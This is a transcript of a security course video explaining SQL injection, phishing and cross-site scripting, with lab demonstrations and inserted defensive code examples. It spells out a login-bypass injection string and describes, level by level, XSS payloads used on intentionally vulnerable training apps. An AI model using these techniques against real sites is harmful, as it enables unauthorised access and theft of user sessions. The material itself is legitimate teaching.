Now let's look at a quick demo. So what we have done here is I have this virtual machine called OWASP Broken Web Applications virtual machine version 1.2. I'm going to power this on; till this powers on, I'm going to show you where we can download this utility from. So you can just look for OWASP Broken Web Applications Project download; you'll find it on SourceForge.net. Click on the link and you can download the Broken Web Applications Project from here. This is a 1.9 GB download, and you can have a zipped machine directly for VMware or Oracle VirtualBox. Now this is an application that has been developed by OWASP, which stands for Open Web Application Security Project, which is a not-for-profit organization and periodically releases the top 10 risks that an application will face for that particular year. So they have given a web application with inbuilt vulnerabilities for professionals like us to practice upon, to develop our skills upon, because doing this in the real world is illegal. I cannot go onto a website to demonstrate how a SQL injection attack works, neither should you try your hands on it till you become very well rehearsed with it. So, to upgrade your skills, to upskill yourself, please download this machine, host it in VMware Workstation or Oracle VirtualBox, and you can then try your skills on it, right?

So just going back to the browser here, if I open up a new tab you'll see that this machine has booted up and has an IP address ending in 71.132. So if I just go on to that IP address and I type in 192.168.71.132, you'll see the OWASP Broken Web Applications Project, and there are a lot of training applications, realistic intentionally vulnerable applications, old versions of real applications and so on and so forth. So there are a lot of applications built in over here that you can try your skills upon. We are going to try to use the OWASP Mutillidae utility over here. This gives you the OWASP Top 10 risks for 2010, 2013 and 2017; 2017 is the latest one so far. But the difference between 2013 and 2017 is that some of these have changed, but not all of them; the order has changed a little bit. But you can see that SQL injection is on the top, A1, amongst the injection attacks, right? And you can see there are multiple types that have been given here: SQL injection for extracting data, SQL injection for bypassing authentication, insert injection attacks, blind SQL injection, and then there is a tool called sqlmap which is available freely on your Linux machines, Kali Linux or Parrot Linux, whichever you want to use for your practice targets and so on and so forth. So if I just take you here, for bypass authentication, this is a regular login page that an application may
have, right? You look at a username, you look at a password, you type that in and you log in. So let's say I don't know a password here; I'm just going to type in the username test, password as psswrd, I'll try to log in, and it shows me that the account does not exist. So the authentication mechanism does work: I did try typing in a username and password, it wasn't recognized, so the account does not exist. Now let's try to type in a SQL query here. I'm going to just give it a single quote, which is an operator that is recognized by the SQL language, which when the database tries to execute will cause the database to dump some data, or to bypass authentication in this case. And I'm going to give it a condition: single quote, or 1 equals 1, space, hyphen hyphen, space, and I'm going to click on login. Now, right now I'm not logged in at all, and we tried our username and password and we weren't able to log in. So now if I log in, you will see that it gives me a status update saying the user has been authenticated and I'm logged in as admin, got root. So that is what these SQL queries can achieve. I'm going to log out right now and we're going to look at the basics of SQL injection.

So looking at that small demo, now let's look at what types of SQL injections are available. So the first is in-band SQL injection; there are two subtypes within in-band, an error-based injection attack and a union-based injection attack. The second type is the blind SQL injection attack, where there's a Boolean-based and a time-based attack, and the third one is the out-of-band SQL injection attack. Now what is an in-band SQL injection attack? In-band is where we are either attempting the error-based or the union-based. What is error-based? We send a query to the database, we craft a query to the database, and it generates an error message and it dumps the error message right in front of us on the screen. That makes us realize that there is a flaw, and there is some information that is dumped on the screen which we can then further utilize to craft our further queries as we go ahead. Whereas union-based is where we combine multiple statements at the same time. So if you look at the URL earlier, in the URL you would see a large structure; in that URL we can try to add two or more statements within the URL itself to combine them and then confuse the database into executing both the statements together and giving a data dump at the same time, right?

So what would an error-based SQL injection look like? If I go back to the same database, which is here, right, and if you remember, for the username we gave it a single quote, or 1 equals 1, space, hyphen hyphen, space; we gave it the condition, right? So basically what it did was this: the single quote is an operator that goes to the database, selects the default table in the user tables in this database column and then compares it to the condition that is given. So the condition that we gave was 1 equals 1, which is always true. So what it did was it selected the default user table that was available in the database and instead of comparing it to a password it compared it to the condition. So if I give it 1 equals 2, where the condition is false, and if I log in, you will see that "the account doesn't exist" comes back again, because the condition was false, and instead of comparing the user account to the password it basically compared the user account to the condition. So if I give it a single quote, or 1 equals 1, hyphen hyphen, space, and log in, you can see that this is a correct condition and thus we are able to log in. Now before we even go to that extent, if I just forget the condition over here and I just give it a single quote, the operator, and I send this operator to the database and I click on login, you will see that it generates an error which is right on top, and it tells us the line, the file where the error happened, and you can see it happened in the MySQLHandler.php file, right? And then it gave us the message: you have an error in your SQL syntax,
check the manual that corresponds to your MySQL server version for the right syntax to use. Now why would a hacker want to do this in the first place? Because there are different types of databases: there is MySQL, MS SQL or Microsoft SQL, Oracle SQL, IBM DB2; all of these are variations of the SQL database, they use the SQL language. However, every database has its own commands, right? They have their own syntax, they have their own specific commands that are utilized for the database. So in this scenario the hacker wants to identify what database is being currently utilized so they can craft those particular queries. So now with this injection, with just me sending the quote and the error getting generated, I now come to know that we are using a MySQL server, and the version of that server is 5.1.73, and the rest of the information about where the handlers are located and so on and so forth, right? This gives the information to the hacker of how they want to proceed next, what kind of queries they want to create, what kind of syntax they want to utilize. So the error-based attack is where you generate these kinds of errors and you get this information; the union-based is where you craft your queries within the URL, or you can try to combine multiple statements within the input fields and try to generate a response from that.

When we come to Boolean-based SQL injection, it sends a SQL query to the database which forces the application to return a different result depending on whether the query returns a true or a false result. So basically, if both the inputs are false the output would be false; if there's one input that is false and the other input, input B, is true, the output would be true, and so on and so forth, right? So depending on the result from the inputs the attacker will come to know which input is true; with this he can then access the database of the website. So you're trying to figure out, by sending out multiple inputs and then analyzing the output, exactly which command worked, what was the resultant output of that command; thus from this kind of information the hacker can infer their next step forward.

Then you have time-based SQL injections. Now, there are times when a database administrator or an application administrator has done some security configuration and thus has disabled verbose error messages. Now what is a verbose error message? The error message that we saw right here is a verbose error message; that means that the message gives out details about what the database is, the version and whatnot. So if they have sanitized these errors and you no longer can generate these errors, and thus you cannot figure out what the database is, then what do you do, right? For example, if I just take you to Simplilearn and take you to a URL that is supposedly not accessible, you can see that it gives a generic error: oops, it looks like you have crash-landed on Mars. It doesn't give you the verbose error that we saw here, which gives us a detailed error of what went wrong, where, the database, the version of the database and where the query went wrong, et cetera, whereas on this side there's a lot of security that goes in here, so you can see that it doesn't generate an error; you just get a generic page in front of you. So in that case, what does a hacker do? The hacker then injects a time-based query in the URL which allows us to verify whether the command is being executed or not. So we put in a time wait, let's say 10 seconds of time wait; so the moment we inject the query, if the query waits for 10 seconds and then gets executed, that means that the SQL injection is possible. However, if we inject the query and it just gets executed without the delay, that means that the time-based injection attack would not be possible on that particular site. Out-of-band is not a very common attack; it depends on the features being enabled in the
database management system that has been used by the web application so this can be a somewhat of a misconfiguration error by the database administrator where you have enabled functions and not sanitize them so you have not done in access controls properly you have not given account control so queries should never be executed at an administrative level they should always be executed a user level with minimum privileges that are required for that query to be executed now if you're allowing these kind of functions to be to be enabled at the dbms and there is an administrative account that can have access to them at that point in time and out of bound injection attack is possible so let's look at how our website works right uh how SQL works on a website now the website is constructed of HTML hypertext markup language which would include JavaScript for functionality cascading style sheets for the mapping of the website right and then the react.js and whatnot uh for for the functionality now when we send a query to the website it is normally using the HTTP protocol or https protocol when the query reaches the application the application would then go ahead and generate the SQL query uh at the client side you'll have all these scripting languages coming in on the front end that we can utilize to craft queries and then send them across at the server side you will have uh databases like Oracle MySQL MSC equal and so on so forth that will then execute those queries right so just to give you an example if I use a tool called Postman what we generally do when we craft a query is we send out a get request to the website and then we will see a response from the site with the HTML code and everything so this is a tool that is utilized by software testers to test the responses that you're going to get from various websites so on the left hand side you can see I've used it on quite a bit here we have an example for gmail.com so let's continue with that so this is a get request 
being sent to Gmail the moment I send it is going to create an HTTP request and send it across the response that I get is this this is the HTML code for gmail.com right these are the cookies these are the headers that include information so it you can see this is a text HTML character set utilized is UDF eight and the configuration that has been done with the application right so this is where everything comes in this is the cookie that has been sent with that particular request that I had sent out now if we Analyze This query right so when we went on to this application and I typed in that single quote and we generated this error right you can see that the application converted this into a SQL query so the query was select username from accounts where the username in quote single quotes and we use the support right the single quote right there so uh that's where we use that operator and that's where the exception error occurred so these are the kind of queries that are structured by the application and then taken on to the database for execution when we type in uh it is a HTTP get request with the username and password within that query that is sent to the application the application converts it into a SQL query sends it to the database and the database responds with the appropriate response so how do we prevent SQL injection in the first place use prepared statement and parameterized queries these statements make sure that the parameters pass into SQL statements are treated in a safe manner so for example we saw that the single code was an operator this shouldn't be allowed to be utilized in the first place right so here what we are doing here is a secure way of running a SQL query in the jdbc using a parameterized statement Define which user we want to find so there's a string the email comes in connection to the database we are going to figure out how the connection is going to be passed how it is going to be created construct the SQL statement we want to run 
specifying the parameter right so we Define how is it going to be created what is going to be created what can be passed through the database and what should not be passed to the database so that is one way of uh utilizing prepaid statements and parameterized queries where we have object relational mapping most development teams prefer to use objection object relational mapping Frameworks to evade the translation of SQL results set into code objects more seamless so this is an example of object relational mapping where we map certain objects and allow that to be executed and then escaping inputs in a simple way to protect against most SQL injection attacks many languages have standard functions to achieve this right so you need to be very careful while using Escape characters in your code base when a SQL statement is constructed not all injection attacks rely on abuse of quote characters so you need to know what characters are being utilized in the configuration that you have created in the structure that you have created in the code that you have created uh which characters are being recognized as operators you need to sanitize those operators and you need to basically ensure that these operators cannot be accepted as user input if they are they have read it out by the application and they never reach the database other methods of preventing SQL injection are password hashing so that passwords cannot be bypassed the passwords cannot be recovered passwords cannot be cracked uh third party authentication you use oauth or some other service for a single sign-on mechanism does you rely on a third party to maintain the security of authentication and uh what kind of parameters are passed for example uh using LinkedIn logins or Facebook logins right for the Layman you normally go on to Facebook and you allow if you're using a game right if you start playing a game you're allowed to log into the game using your Facebook credentials or your Google credentials now that is 
not just for ease of use but the game user the developer has outsourced the authentication mechanisms to third parties such as Facebook or Google because they understand that that authentication mechanism is as safe as can be Facebook and Google are wealthy organizations uh hire a lot of Security Experts and the development for their authentication mechanisms is Top Notch the small organization cannot spend that kind of money on security itself right so you use a third party authentication mechanism to ensure that these kind of attacks may not happen then web application firewalls uh having a web application firewall and configuring it properly uh for SQL injection attacks is one of the Sure Shot method of uh mitigating or minimizing that uh threat in the first place so at this point in time you have realized that the application has some vulnerabilities for SQL injection and instead of recoding or restructuring the application uh you want to take the easier way out or the cheaper way out so what you do is you you install a web application firewall and you configure the web application firewall to identify malicious queries and stop them at the firewall level itself so they never reach the application and thus the vulnerabilities on the application don't get executed buy better software and I'll keep on updating the software so it's not necessary that once you have a software you install it it's going to be safe for Life new vulnerabilities are discovered every day every hour and it may so happen what is secure today may be completely insecure tomorrow or the day after right so you need to keep on upgrading the software if there are no upgrades available and the volatility still exists you might want to migrate to a better software and thus ensure that you don't get hacked right always updated use patches organizations keep on sending out updates and patches as and when they are released you need to install them to enhance your security postures and then 
continuously monitor SQL statements and databases use protocol monitors uh use different softwares use the firewalls to keep on monitoring what kind of queries you're getting and based on those queries you want to ensure the inputs and the queries that are creating uh are not detrimental to the health of the software that you have Jane is relaxing at home when she receives an email from a bank that asks her to update her credit card pin in the next 24 hours as a security measure judging the severity of the message Jane follows the link provided in the email on delivering her current credit card pin and the supposedly updated one the website became unresponsive which prompted her to try sometime later however after a couple of hours she noticed a significant purchase from a random website on that same credit card which she never authorized frantically contacting the bank Jane realized the original email was a counterfeit or a fake message with a malicious link that Intel credit card fraud this is a classic example of a phishing attack fishing attacks are a type of social engineering where fraudulent message is sent to a Target on the premise of arriving from a trusted source basic purpose is to trick the victim into revealing sensitive information like passwords and payment information it's based on the word phishing which works on the concept of baits if a supposed victim catches the bait the attack can go ahead which in our case makes Jane the fish in the phishing emails the bait if Jane never opened the malicious link or was cautious about the email authenticity an attack of this nature would have been relatively ineffective but how does the hacker gain access to these credentials a phishing attack starts with a fraudulent message which can be transmitted via email or chat applications even using SMS conversations to impersonate legitimate sources is known as smishing which is a specific category of phishing attacks irrespective of the manner of transmission the 
message targets the victim in a way that coaxes them to open a malicious link and provide critical information on the requisite website more often than not the websites are designed to look as authentic as possible once the victims submit information using the link be it a password or credit card details the data is sent to the hacker who designed the email and the fake website giving him complete control over the account whose password was just provided often carried out in campaigns or an identical fishing mail sent to thousands of users the rate of success is relatively low but never zero between 2013 and 2015 corporate giants like Facebook and Google were tricked off of 100 million dollars due to an extensive fishing campaign where a known common associate was impersonated by the hackers apart from credit access some of these campaigns Target the victim device and install malware when clicked on the malicious links which can later function as a botnet or a target for ransomware attacks there is no single formula for there are multiple categories of phishing attacks the issue with Jane or the hacker stole our bank credentials falls under the umbrella of deceptive fishing a general email is sent out to thousands of users in this category hoping some of them fall prey to this scam spear fishing on the other hand is a bit customized version the targets are researched before being sent an email for example if you never had a Netflix subscription sending you an email that seems like the Netflix Team sends it becomes pointless this is a potential drawback of deceptive fishing techniques on the other hand a screenshot of a Spotify playlist being shared on social media indicates a probable point of entry the hacker can send counterfeit messages to the Target user while implying the source of such messages being Spotify tricking them into sharing private information since the hacker already knows the target uses Spotify the chances of victims taking the bait increase 
substantially for more important targets like CEOs and people with a fortune on their back the research done is 10 full which can be called a case of whaling the hackers prepare and wait for the right moment to launch their phishing attack often to still industry secrets for rival companies or sell them off at a higher price apart from just emails farming focuses on fake websites that resemble their original counterparts as much as possible a prevalent method is to use domain names like Facebook with a single o or YouTube with no e these are mistakes that people make when typing the full URL in the browser leading them straight to a counterfeit webpage which can fool them into submitting private data a few more complex methods exist to drive people onto fake websites like ARP spoofing and DNS cache poisoning but they are rarely carried out due to time and resource constraints now that we know how phishing attacks work let's look at ways to prevent ourselves from becoming victims while the implications of a phishing attack can be extreme protecting yourself against these is relatively straightforward Jane could have saved herself from credit card fraud had she checked the link in the email for authenticity and that it redirected to a secure website that runs on the https protocol even suspicious messages shouldn't be entertained one must also refrain from entering private information on random websites or pop-up Windows irrespective of how legitimate they seem it is also recommended to use secure anti-fishing browser extensions like cloudfish to sniff out malicious emails from legitimate ones the best way to prevent phishing is browsing the internet with care and being on alert for malicious attempts at all times start by learning about cross-site scripting from a Layman's perspective foreign also known as xss is a type of code injection attack that occurs on the client side the attacker intends to run harmful scripts in the victim's web browser by embedding 
malicious code in a genuine webpage or online application the real Attack takes place when the victim hits the malicious code infected web page or online application the web page or application serves as a vehicle for the malicious script to be sent to the user's browser forums message boards and online pages that enable comments are vulnerable vehicles that are frequently utilized for cross-scripting assaults a web feature web application is vulnerable to xss if the output it creates contains unsanitized user input the victim's browser must then pass this user input in vbscript ActiveX Flash and even CSS cross-site scripting attacks are conceivable they are nevertheless most ubiquitous in JavaScript going to the fact that JavaScript is most important to most browser experiences nowadays the main purpose of this attack is to steal the other user's identity be it via cookies session tokens and other information in most of the cases this attack is being used to steal the other person's cookies as we know cookies help us to log in automatically therefore with the stolen cookies we can log in with other identities and this is one of the reasons why this attack is considered as one of the riskiest attacks it can be performed with different client-side programming languages as well cross-site scripting is often compared with similar client set attacks as client-side languages are mostly being used during this however an xss attack is considered riskier because of its ability to damage even less vulnerable Technologies most often this attack is performed with JavaScript and HTML JavaScript is a programming language that runs on web pages inside your browser the client-side code add functionality and interactivity to the web page and is used extensively on all major applications and CMS platforms unlike server-side languages such as PHP JavaScript code runs inside your browser and cannot impact the website for other visitors it is sandboxed to your own Navigator and can 
only perform actions within your own browser window while JavaScript is client-side and does not run on the server it can be used to interact with the server by performing background requests attackers can then use these background requests to add unwanted spam content to a web page without refreshing it they can then gather analytics about the client's browser or perform actions asynchronously the manner of attack can range in a variety of ways it can be a single link which the user must click on to initiate a JavaScript piece of code it can be used to show any piece of images that can be later used as a front-end for malicious code being installed as malware but the majority of Internet users unaware of how metadata works or the ways in which web requests are called the chances of victims clicking on a redirecting links is far too high cross-site scripting can occur on the malicious script executed at the client side using a fake page or even a form that is displayed to the user on websites with displayed advertisements malicious emails can also be sent to the victim these attacks occur when the malicious user finds the vulnerable parts of the website and sends it as appropriate malicious input now that we understand the basics of cross-site scripting let us learn more about how this kind of attack works the first place we have the website or the web browser which is used to show content to the victim or which is the user in our case whenever the user wants to grab some content from the website the website asks the data from the server the server provides this information to the website and the web browser which ultimately resists the victim how the hacker comes into play here it passes on certain arguments to the web browser which is can be then forwarded back to the server or to the user at hand the entire cross-site scripting attack Vector means sending and injecting malicious code or script this attack can be performed in different ways depending on the type 
of attack the malicious script may be reflected on the victim's browser or stored in the database and executed every time when the user calls the appropriate function the main reason for this attack is inappropriate users input validation where the malicious input can get into the output a malicious user can enter a script which will be injected onto the website's code then the browser is not able to know if the executed code is malicious or not therefore this malicious script is being executed on the victim's browser or any faked form if that is being displayed for the users there are many ways to trigger an exercise attack for example the execution could be triggered automatically when the page loads or when a user hovers over specific elements of the page like hyperlinks potential consequences of cross-site scripting attacks include capturing keystrokes of a user redirecting a user to malicious websites running web browser-based exploits obtaining cookie information of a user who is logged into a website and many more in some cases cross-site scripting attack leads to complete compromise of the victim's account attackers can trick users into entering credentials on a fake form which can then provide all information to the attacker with the basic working of a cross-site scripting attack out of the way let us go over the different ways hackers can leverage vulnerable web applications to gather information and eventually Bridge those systems foreign purpose of Performing exercise attack is to steal the other person's identity as mentioned it may be cookies session tokens Etc xss may also be used to display faked Pages or forms for the victim however this can be performed in several ways we have a reflected attack this attack occurs when a malicious script is not being saved on the web server but is reflected in the website results reflected xss code is not being saved permanently in this case the malicious code is being reflected in any website result the attack 
code can be included in the faked URL or in the HTTP parameters it can affect the victim in different ways by displaying fake malicious page or by sending a malicious email in a reflected cross-site scripting example the input of a search form is reflected on the page to show what the search key was an attacker May crafter URL that contains malicious code and then spread the same URL via email or social media a user who clicks on this link opens the valid web application which then runs the malicious code in the browser this script is not stored in the web application and malicious code is shown only to one user the user that opens the link executes the script and the attack is not necessarily visible on the server side or to the app owner itself the next variant is a stored cross-site scripting attacks this occurs when a malicious script is being saved on the web server permanently this can be considered a riskier attack since it has leverage for more damage in this type of attack the malicious code or script is being saved on the server for example in the database of the website it is executed every time the users call the appropriate functionality this way stored xss attack can affect many users also as the script is being stored on the web server it will affect the website for a longer time in order to perform stored xss attack the malicious scripts should be sent through the vulnerable input form for example can be a comment field or review field this way the appropriate script will be saved in the database and evaluated on the page load or appropriate function calling in a stored xss example the script might have been submitted by an input field to the web server which did not perform a sufficient validation and stores the script permanently in the database the consequence of this might be that the script is now being delivered to all users visiting the web application and if for example able to gain access to the user session cookies in this attack the 
script is permanently stored in the web app the users visiting the app after the information retrieve the script the malicious code then exploits the flaws in the web application and the script and the attack is visible on the server side or to the app owner as well the third variant is Dom based cross-site scripting attacks this type of attack occurs when the Dom environment is being changed but the client-side code does not change when the Dom environment is being modified in the victim's browser the client-side code executes differently in order to get a better understanding of how xss Dom attack is being performed let us analyze the following example if there is a website called texting.com we know default is a parameter therefore in order to perform access Dom attack we should send a script as parameters a Dom based exercise attack may be successfully executed even when the server does not embed any malicious code into the web page by using a flaw in the JavaScript executed in the browser for example if the client-side JavaScript modifies the Dom tree of the web page it can be based on an input field or the get parameter without validating the input this allows the malicious code to be executed the malicious code the exploits flaws in the browser on the user side and the script and the attack is not necessarily visible on the server side or to the app owner by now it is clear that cross-site scripting attacks are difficult to detect and even tougher to fight against there are however plenty of fears one can Safeguard against such attacks let's go through some of these preventive measures like mentioned earlier exercise attacks are sometimes difficult to detect however this can be changed if you get some external help a way to prevent excessive attacks is using automated testing tools like crash test security suit or a kinetic security suit still manual testing is highly time consuming and costly and therefore not possible to be done for every iteration of your 
web application consequently your code shouldn't be untested before any release using automated security you can scan your web application for cross-site scripting and other critical vulnerabilities before every release this way you can ensure that a web application slide version is still secured whenever you alter or add a feature input fields are the most common point of entry for xss attack script therefore you should always screen and validate any information input into data fields this is particularly important if the data will be included as HTML output this can be used to protect against reflected xss attacks validation should occur on both the client side and server side as an added precaution this helps validating the data before it's being sent to the servers and can also protect against persistent xss Scripts this can be accomplished using JavaScript xss attacks only appear if any user input is being displayed on the web page therefore try to avoid displaying any untrusted user input if possible if you need to display user data restrict the places where the user input might appear any input displayed inside a JavaScript tag or a URL shown on the site is much more likely to be exploited than the input that appears inside a division or span element inside the HTML body protecting against xss vulnerabilities typically requires properly escaping user provided data that is placed on the page rather than trying to determine if the data is user provided and could be compromised we should always play it safe and Escape data whether it is user provided or not unfortunately because there are many different rules for escaping you still must choose the proper type of escaping before settling on a final code encoding should be applied directly before user controllable data is written to a page because the context you're writing into determines what kind of encoding you need to use for example values inside a JavaScript string require a different type of escaping to 
those in an HTML context sometimes you'll need to apply multiple layers of encoding in the correct order for example to safely embed user input inside an event handler you need to deal with both JavaScript context and the HTML context so you need to First Unicode escape the input and then HTML encoded content security policy or CSP is a computer security standard introduced to prevent cross-site scripting click checking and other code injection attacks resulting from the execution of malicious content in The Trusted web page context it is a candidate recommendations of the w3c working group on a web application security it's widely supported by modern web browsers and provides a standard method for website owners to declare approved origins of content that browsers should be allowed to load on that website HTTP only is an additional flag included in a set cookie HTTP response header using the HTTP only flag when generating a cookie helps mitigate the risk of client-side script accessing the protected cookie that is if the browser supports it if the HTTP only flag is included in the HTTP response header the cookie cannot be accessed through a client-side script again this is if the browser supports the select as a result even if a cross-site scripting flaw exists and a user accidentally accesses a link that exploits this flow the browser will not reveal the cookie to a third party if a browser does not support HTTP only and a website attempts to set an HTTP only cookie the HTTP only flag will be ignored browse the browser thus creating a traditional script accessible cookie as a result the cookie becomes vulnerable to theft of modification by any malicious script next on our docket is a live demonstration where we solve a set of cross-site scripting problems starting from the basic level to the topmost level 6. we're going to start at level 1. 
In this web application, it demonstrates a common cause of cross-site scripting where user input is directly included in the page without proper escaping. If we interact with the vulnerable application window here and find a way to make it execute JavaScript of our choosing, we can take actions inside the vulnerable window or directly edit its URL bar. This task needs only basic knowledge; let's see why the most primitive injections work here right away. Let's do a simple query and inspect the resulting HTML page. I am going to use this phrase with a single quote as a special character. We can now inspect the HTML page, and we can see here, in this line, that the special character, the single quote, appears in the result. Over here the provided query text is placed directly in a b tag inside the body element. We need to perform a reflected XSS into the web application; because these are non-persistent XSS attacks, the payload should be included in the URL to perform successful exploitation. We can use any payload, but we're going to use the simple one, to perform an alert in this web application; it's simple and can be shown easily. We're just going to write the script over here and press search. As you can see, we have successfully launched our first cross-site scripting attack: we can see an alert box pop up with the necessary message. A similar process can be used to steal browser cookies and passwords, albeit with different commands. Now we have the option to move to level 2.
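An added example, not part of the course's demonstration, that reproduces the level-1 pattern in Node.js: the search term echoed into a b tag by a vulnerable renderer beside an escaped one, the context-specific encoders described earlier (HTML body, JavaScript string, and the two-layer case of an event handler), and a small probe that detects whether a renderer reflects input unescaped. The function names, the sample page and the probe string are assumptions of this example.

```javascript
// Added example (not from the course): the level-1 bug, user input placed in
// the page without escaping, next to the escaped version and the encoders for
// each output context. Function names and the sample page are assumptions.

// Vulnerable: the query is concatenated into the HTML unescaped (the level-1 bug).
function renderSearchVulnerable(query) {
  return `<html><body>Sorry, no results were found for <b>${query}</b>.</body></html>`;
}

// HTML body/attribute escaping: neutralises the characters that can open a
// tag, close a quoted attribute, or start an entity.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, c => HTML_ESCAPES[c]);
}

// Fixed renderer: the same page, with the query escaped for the HTML-body context.
function renderSearchSafe(query) {
  return `<html><body>Sorry, no results were found for <b>${escapeHtml(query)}</b>.</body></html>`;
}

// JavaScript-string escaping: every non-alphanumeric character becomes \uXXXX,
// so the value can never terminate the string literal or add code after it.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Event-handler context: the value sits inside a JS string inside an HTML
// attribute, so the JS escape is applied first and the HTML escape second,
// the order described in the course.
function renderGreetingButton(name) {
  const inner = escapeHtml(escapeJsString(name));
  return `<button onclick="greet('${inner}')">Greet</button>`;
}

// Probe a renderer the way a scanner would: send a marker wrapped in the
// characters that matter and check whether it comes back with them intact.
// Returns true when the renderer reflects input unescaped (the level-1 flaw).
const PROBE = "qz9<probe>'\"qz9";
function probeReflection(render) {
  return render(PROBE).includes(PROBE);
}
```

`probeReflection(renderSearchVulnerable)` returns true and `probeReflection(renderSearchSafe)` returns false, which is the whole difference between the level-1 page and its fix; the same probe idea applies to any renderer that takes a string, so it can be run against each place an application writes user data into a page.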
in this web application it shows that how easily accessed bugs can be introduced in complex chat applications chat app conversations are stored in a database and retrieved when a user wants to see the conversation therefore if a malicious user injects some JavaScript code all visitors will be infected this kind of cross-site scripting attack is more powerful and it is more riskier than reflected cross-site scripting attacks and that's why is known as stored xss I posted my query with a special character of a single quote and this is what I get whatever I typed in simply appeared on the page right after I click on share status let's see the source you can see here the text I posted seems directly put inside a block code tag so even a simple script tag we used in level 1 should work here but it will not let us examine the code to understand why we're going to toggle the code away here and check the index.html file foreign part is line 32. the generated HTML fragment which is the HTML variable in the code is added to the mail HTML using the inner HTML method so when the browser passing this HTML fragment it will not execute any script tag defined within that HTML fragment HTML parser will not execute a script tag when it passes htmls via this method this is why the script tag like we used in level 1 is not going to work here our solution is to use events events will execute the defined javascripts we're going to use an image over here and when we press on share status and that's above injection we are loading an image that doesn't exist which causes to trigger an on error event an honor event the it will execute our alert method with that we are able to beat level 2 and we can now move up to the next level in our challenge as you can see clicking on any tab causes the tab number to be displayed in the URL fragment this hints that the value after the hashtag controls the behavior of the page that is it is an input variable to confirm let's analyze the code as you can 
see in line 43 inside the event handler the value provided after the hash in the URL is directly passed on to the chooseTab method no input validation is being performed the value passed to the chooseTab method is directly injected into the img tag in line 17. this is an unsafe assignment and it is the vulnerable part of the code now all we have to do is craft a payload that would adjust the img tag to execute our JavaScript remember the script tag from level 1 would not work here since the html variable is used to add to the DOM dynamically hence events are the answer here once again I will choose to use the existing img tag and change the source to something that doesn't exist hence forcing it to fail and execute an onerror event which I will pass in the URL once we visit that URL we can see that our JavaScript pop-up has opened up here with the same message that exercise level 3 has been completed with this we can now move on to level 4 which is going to present a different kind of attack in this web application there is a timer on the page that means whatever number we put in the box a countdown starts and when it finishes the application alerts that the countdown is finished we can see the time is up pop-up appearing over here and this resets the timer again now it is obvious that the value entered in the text box is transferred to the server over the timer parameter in the URL let us examine the code to see how the timer parameter is being handled we're going to visit timer.html over here and we're going to check over here in line 21 the startTimer method is being called in the onload event however the timer parameter is being directly passed to the startTimer method we need to perform a pop-up alert in the web application which escapes the content of the startTimer function call without breaking the JavaScript code the parameter value is directly added to the startTimer method without any filtering what we can try to do here is to inject an alert function
to be executed inside the onload event along with the startTimer method we're going to remove this argument and put our script over here now let me press on create timer and we have a pop-up with exercise level 4 completed we can now move on to level 5. in this web application the XSS is different because as the challenge description says cross-site scripting isn't just about correctly escaping data sometimes attackers can do bad things even without injecting new elements into the DOM it's a kind of open redirect because the attack payload is executed as a result of modifying the DOM environment in the victim's browser this environment is used by the original client-side script so that the client-side code runs in an unexpected manner the vulnerability can be easily detected if the next link in the sign up page is inspected the href attribute value of the next link is confirm which is exactly the value of the next URL query parameter as you can see over here this means the next query parameter can be used to inject JavaScript code into the href attribute of the next link the following is the best way to do it as soon as the user clicks on the link the script will be triggered the pop-up shows the level 5 message that we had provided in the URL as a parameter to the next variable since the value of next provided appears in a pop-up we can consider the attack a success and move on to the final level 6.
in this application some external JavaScript is loaded if you analyze the URL you can see that the script is loaded already the vulnerability lies within how the code handles the value after the hash if we check on line 45 the value right after the hash is taken as the gadget name and then in line 48 the value is directly passed on to the includeGadget method in the includeGadget method that we can see over here you can see in line 18 a script tag is created and the gadget name parameter value from the URL is directly used as the source attribute of the script tag in line 28. this means we can completely control the source attribute of the script tag that is being created that is with this vulnerability we can inject our own JavaScript file into the code we can inject the URL of our own hosted JavaScript into the web application's URL after the hash and the URL should not be using https or anything like that so that it bypasses the regular expression used for the security check we're going to remove the pre-stored URL and we're going to load our own JavaScript file finally we have reached the end of our challenge we completed six different varieties of cross-site scripting attacks and used different solutions for all of the six questions with work from home being the norm in today's era people spend a considerable amount of time on the internet often without specific measures to ensure a secure session apart from individuals organizations worldwide that host data and conduct business over the internet are always at the risk of a DDoS attack these DDoS attacks are getting more extreme with hackers getting easy access to botnet farms and compromised devices as can be seen in the graph three of the six strongest DDoS attacks were launched in 2021 with the most extreme attack occurring just last year in 2020.
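The six XSS levels walked through above each boil down to one unsafe assignment of untrusted input into markup, a DOM attribute, an inline script string, an href or a script src. As an added example, not code from the challenge or from the video, here is the defensive counterpart to each pattern as pure functions that run in Node; the origin, image paths and gadget path are placeholders.

```javascript
// Added example, not from the XSS game or the video: defensive counterparts
// to the six injection points discussed above. Pure functions, no browser needed.

const APP_ORIGIN = "https://app.example"; // assumed application origin (placeholder)

// Levels 1 and 2: text that is reflected or stored and then inserted as HTML
// must be escaped, so '<img onerror=...>' and '<script>' become inert text.
// (In a browser, assigning to textContent instead of innerHTML does the same.)
const ESCAPE_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPE_MAP[ch]);
}

// Level 2: build the status-post fragment with the user text escaped before it
// is concatenated into markup; only then is it safe to hand to innerHTML.
function renderPost(text) {
  return `<blockquote>${escapeHtml(text)}</blockquote>`;
}

// Level 3: the value after '#' was concatenated into an <img> tag. Here it only
// selects from a fixed table, so the fragment never contributes markup characters.
const TAB_IMAGES = { 1: "/static/tab1.jpg", 2: "/static/tab2.jpg", 3: "/static/tab3.jpg" }; // placeholders
function chooseTabSrc(fragment) {
  return /^[1-3]$/.test(String(fragment)) ? TAB_IMAGES[Number(fragment)] : TAB_IMAGES[1];
}

// Level 4: the timer value was spliced into startTimer('...') inside an onload
// attribute, so a quote in the value broke out of the string literal. Parse it
// to a bounded integer and hand the caller a number, never a string.
function parseTimerSeconds(raw, fallback = 3) {
  const s = String(raw);
  return /^\d{1,5}$/.test(s) ? Number(s) : fallback;
}

// Level 5: the 'next' query parameter became the href of the Next link, so a
// javascript: URL ran on click. Resolve against our origin and keep only
// same-origin paths; javascript:, data: and other hosts all fail the check.
function safeNextUrl(next, fallback = "/") {
  let resolved;
  try {
    resolved = new URL(String(next), APP_ORIGIN + "/");
  } catch {
    return fallback;
  }
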